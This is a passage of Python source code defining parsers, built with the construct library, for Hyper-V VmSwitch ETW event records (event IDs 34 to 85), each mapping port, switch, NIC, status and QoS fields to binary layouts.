"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=34, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_34_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=35, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_35_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=36, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_36_0(Etw):
pattern = Struct(
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"AclNameLen" / Int32ul,
"AclName" / Bytes(lambda this: this.AclNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=37, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_37_0(Etw):
pattern = Struct(
"IpsecOffloadInboundDropReason" / Int32ul,
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"DestAddressLen" / Int32ul,
"DestAddress" / Bytes(lambda this: this.DestAddressLen),
"SPI" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=38, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_38_0(Etw):
pattern = Struct(
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"DestAddressLen" / Int32ul,
"DestAddress" / Bytes(lambda this: this.DestAddressLen),
"SPI" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=39, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_39_0(Etw):
pattern = Struct(
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"OffloadHandle" / Int64ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=40, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_40_0(Etw):
pattern = Struct(
"IpsecSaOffloadFailureReason" / Int32ul,
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"Status" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=41, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_41_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=42, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_42_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"Flags" / Int32ul,
"OwnerService" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=43, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_43_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"Flags" / Int32ul,
"OwnerService" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=44, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_44_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"VmqIndex" / Int32ul,
"SourceProcIndex" / Int32ul,
"DestinationProcIndex" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=45, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_45_0(Etw):
pattern = Struct(
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=46, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_46_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=47, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_47_0(Etw):
pattern = Struct(
"CurrentTime" / Int64ul,
"BytesSent" / Int32ul,
"BytesDropped" / Int32ul,
"NewSendWindow" / Int32ul,
"MinSendWindow" / Int32ul,
"Weight" / Int32ul,
"SBytesRequested" / Int64sl,
"DropRate" / Int32ul,
"IdleIntervals" / Int64ul,
"RcSendWindow" / Int32ul,
"RcEpisodeLength" / Int32ul,
"RcStatMuxFactor" / Int32ul,
"RcExitThreshold" / Int32ul,
"AverageMaxBytesRequested" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=48, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_48_0(Etw):
pattern = Struct(
"CurrentTime" / Int64ul,
"ActiveFlows" / Int32ul,
"ActiveWeight" / Int32ul,
"NewSendWindow" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=49, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_49_0(Etw):
pattern = Struct(
"FlowConformanceEvent" / Int32ul,
"CurrentTime" / Int64ul,
"LastConformanceTime" / Int64ul,
"PeakConformanceTime" / Int64ul,
"Tokens" / Int64ul,
"MaxTokens" / Int64ul,
"Rate" / Int64ul,
"LastConformanceCredits" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=50, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_50_0(Etw):
pattern = Struct(
"FlowSendQueueEvent" / Int32ul,
"CurrentTime" / Int64ul,
"IdleTime" / Int64ul,
"DelayTime" / Int64ul,
"BytesRequested" / Int32ul,
"BytesSent" / Int32ul,
"BytesQueued" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=51, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_51_0(Etw):
pattern = Struct(
"TimerEvent" / Int32ul,
"TimerId" / Int32ul,
"CurrentTime" / Int64ul,
"SetTime" / Int64ul,
"RunTime" / Int64ul,
"FlowsProcessed" / Int32ul,
"NblsSent" / Int32ul,
"NblsDropped" / Int32ul,
"Flags" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=52, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_52_0(Etw):
pattern = Struct(
"CurrentTime" / Int64ul,
"BytesRequested" / Int32ul,
"BytesCompleted" / Int32ul,
"BytesInQueue" / Int32ul,
"BufferAvailable" / Int64sl,
"BetaTerm" / Int64sl,
"AlphaTerm" / Int64sl,
"DeltaSendWindow" / Int64sl,
"NewSendWindow" / Int64sl
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=53, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_53_0(Etw):
pattern = Struct(
"DropReason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=54, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_54_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"DropReason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=55, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_55_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"DropReason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=56, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_56_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"BufferAddress" / Int64ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=57, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_57_0(Etw):
pattern = Struct(
"SrcNicNameLen" / Int32ul,
"SrcNicName" / Bytes(lambda this: this.SrcNicNameLen),
"SrcNicFNameLen" / Int32ul,
"SrcNicFName" / Bytes(lambda this: this.SrcNicFNameLen),
"DestNicNameLen" / Int32ul,
"DestNicName" / Bytes(lambda this: this.DestNicNameLen),
"DestNicFNameLen" / Int32ul,
"DestNicFName" / Bytes(lambda this: this.DestNicFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"BufferAddress" / Int64ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=58, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_58_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"BufferAddress" / Int64ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=59, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_59_0(Etw):
pattern = Struct(
"ExtensionNameLen" / Int32ul,
"ExtensionName" / Bytes(lambda this: this.ExtensionNameLen),
"SrcNicNameLen" / Int32ul,
"SrcNicName" / Bytes(lambda this: this.SrcNicNameLen),
"SrcNicFNameLen" / Int32ul,
"SrcNicFName" / Bytes(lambda this: this.SrcNicFNameLen),
"DestNicNameLen" / Int32ul,
"DestNicName" / Bytes(lambda this: this.DestNicNameLen),
"DestNicFNameLen" / Int32ul,
"DestNicFName" / Bytes(lambda this: this.DestNicFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=60, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_60_0(Etw):
pattern = Struct(
"SrcNicNameLen" / Int32ul,
"SrcNicName" / Bytes(lambda this: this.SrcNicNameLen),
"SrcNicFNameLen" / Int32ul,
"SrcNicFName" / Bytes(lambda this: this.SrcNicFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"ExtensionGuidLen" / Int32ul,
"ExtensionGuid" / Bytes(lambda this: this.ExtensionGuidLen),
"ExtensionFriendlyNameLen" / Int32ul,
"ExtensionFriendlyName" / Bytes(lambda this: this.ExtensionFriendlyNameLen),
"ReasonLen" / Int32ul,
"Reason" / Bytes(lambda this: this.ReasonLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=61, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_61_0(Etw):
pattern = Struct(
"ExtensionNameLength" / Int32ul,
"ExtensionName" / Bytes(lambda this: this.ExtensionNameLength),
"ExtensionId" / Guid,
"FeatureClassId" / Guid,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"VMNameLen" / Int32ul,
"VMName" / Bytes(lambda this: this.VMNameLen),
"VMIdLen" / Int32ul,
"VMId" / Bytes(lambda this: this.VMIdLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=62, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_62_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"Flags" / Int32ul,
"OwnerService" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=63, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_63_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=64, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_64_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"Flags" / Int32ul,
"OwnerService" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=65, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_65_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=66, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_66_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"Flags" / Int32ul,
"OwnerService" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=67, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_67_0(Etw):
pattern = Struct(
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"Flags" / Int32ul,
"OwnerService" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=68, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_68_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=69, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_69_0(Etw):
pattern = Struct(
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"Flags" / Int32ul,
"OwnerService" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=70, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_70_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=71, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_71_0(Etw):
pattern = Struct(
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"Flags" / Int32ul,
"OwnerService" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=72, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_72_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=73, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_73_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=74, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_74_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=75, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_75_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"UniqueEvent" / Int32ul,
"Operation" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=76, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_76_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"Operation" / Int32ul,
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=77, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_77_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=78, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_78_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"PropertyId" / Guid,
"InstanceId" / Guid,
"UniqueEvent" / Int32ul,
"Operation" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=79, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_79_0(Etw):
pattern = Struct(
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"PropertyId" / Guid,
"InstanceId" / Guid,
"Operation" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=80, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_80_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"PropertyId" / Guid,
"InstanceId" / Guid,
"UniqueEvent" / Int32ul,
"Operation" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=81, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_81_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"PropertyId" / Guid,
"InstanceId" / Guid,
"Operation" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=82, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_82_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"Reservation" / Int64sl,
"Weight" / Int64sl,
"Limit" / Int64sl,
"BurstLimit" / Int64sl,
"BurstSize" / Int64sl,
"FailReason" / Int32ul,
"Operation" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=83, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_83_0(Etw):
pattern = Struct(
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"Reservation" / Int64sl,
"Weight" / Int64sl,
"Limit" / Int64sl,
"BurstLimit" / Int64sl,
"BurstSize" / Int64sl,
"Operation" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=84, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_84_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"Status" / Int32ul,
"Reservation" / Int64sl,
"Weight" / Int64sl
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=85, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_85_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"Status" / Int32ul,
"Reservation" / Int64sl,
"Weight" / Int64sl
)
